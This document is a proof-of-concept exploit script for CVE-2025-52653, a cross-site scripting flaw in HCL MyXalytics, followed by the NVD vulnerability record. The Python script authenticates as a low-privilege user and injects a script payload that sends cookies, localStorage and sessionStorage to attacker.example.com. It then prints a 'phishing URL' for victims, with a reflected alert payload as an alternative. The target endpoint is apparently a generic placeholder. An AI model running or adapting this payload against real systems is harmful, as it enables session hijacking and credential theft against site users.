CVE-2025-52653

# CVE-2025-52653 - HCL MyXalytics XSS PoC # Vulnerability: Reflected/Stored Cross-Site Scripting in HCL MyXalytics # CVSS: 7.6 (HIGH) import requests TARGET_URL = "https://target-myxalytics.example.com" LOGIN_URL = f"{TARGET_URL}/api/auth/login" INJECTION_ENDPOINT = f"{TARGET_URL}/api/search" # Example endpoint, replace with actual vulnerable endpoint # Step 1: Authenticate with low-privilege credentials (PR:L) session = requests.Session() credentials = { "username": "attacker_user", "password": "attacker_password" } session.post(LOGIN_URL, json=credentials) # Step 2: Craft malicious XSS payload # The payload attempts to steal session cookies and exfiltrate to attacker server xss_payload = """ <script> fetch('https://attacker.example.com/steal', { method: 'POST', mode: 'no-cors', body: JSON.stringify({ cookies: document.cookie, url: window.location.href, localStorage: JSON.stringify(localStorage), sessionStorage: JSON.stringify(sessionStorage) }) }); </script> """ # Step 3: Inject payload into vulnerable parameter # The injection point could be a search field, comment, profile field, etc. injection_params = { "q": xss_payload, # 'q' is example parameter name "filter": "all", "page": "1" } response = session.get(INJECTION_ENDPOINT, params=injection_params) # Step 4: Verify injection success if xss_payload in response.text: print("[+] XSS payload successfully injected into the response") print("[+] When an admin or other user visits this URL, the script will execute") # Craft a phishing URL to send to the victim phishing_url = response.url print(f"[+] Phishing URL: {phishing_url}") else: print("[-] Injection may have failed or payload is filtered") # Alternative: Direct URL-based reflected XSS payload direct_xss_url = f"{INJECTION_ENDPOINT}?q=<script>alert(document.cookie)</script>" print(f"\n[+] Direct reflected XSS URL: {direct_xss_url}")

{"cve": {"id": "CVE-2025-52653", "sourceIdentifier": "[email protected]", "published": "2025-10-03T18:15:35.697", "lastModified": "2025-10-08T16:50:59.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL MyXalytics product is affected by Cross Site Scripting vulnerability in the web application. This can allow the execution of unauthorized scripts, potentially resulting in unauthorized actions or access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:*", "matchCriteriaId": "63206848-DCF7-4835-A58C-5F3E7F455E5C"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}